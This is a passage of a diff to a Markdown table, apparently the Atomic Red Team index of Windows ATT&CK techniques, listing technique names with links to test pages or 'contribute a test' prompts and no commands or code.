(Windows)](../../T1037.001/T1037.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [File Deletion](../../T1070.004/T1070.004.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | [Remote Access Software](../../T1219/T1219.md) | | -| | | [Local Accounts](../../T1078.003/T1078.003.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Office Application Startup](../../T1137/T1137.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | -| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Hide Artifacts](../../T1564/T1564.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Office Test](../../T1137.002/T1137.002.md) | [Port Monitors](../../T1547.010/T1547.010.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [Outlook Home Page](../../T1137.004/T1137.004.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | -| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | | -| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | -| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | -| | | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | -| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | -| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Local Accounts](../../T1078.003/T1078.003.md) | [Malicious File](../../T1204.002/T1204.002.md) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [DCSync](../../T1003.006/T1003.006.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | +| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Visual Basic](../../T1059.005/T1059.005.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | +| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Windows Management Instrumentation](../../T1047/T1047.md) | [Domain Account](../../T1136.002/T1136.002.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | +| | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Escape to Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | +| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Time Discovery](../../T1124/T1124.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [External Remote Services](../../T1133/T1133.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | [Remote Access Software](../../T1219/T1219.md) | | +| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Local Account](../../T1136.001/T1136.001.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Local Accounts](../../T1078.003/T1078.003.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1070.004/T1070.004.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | 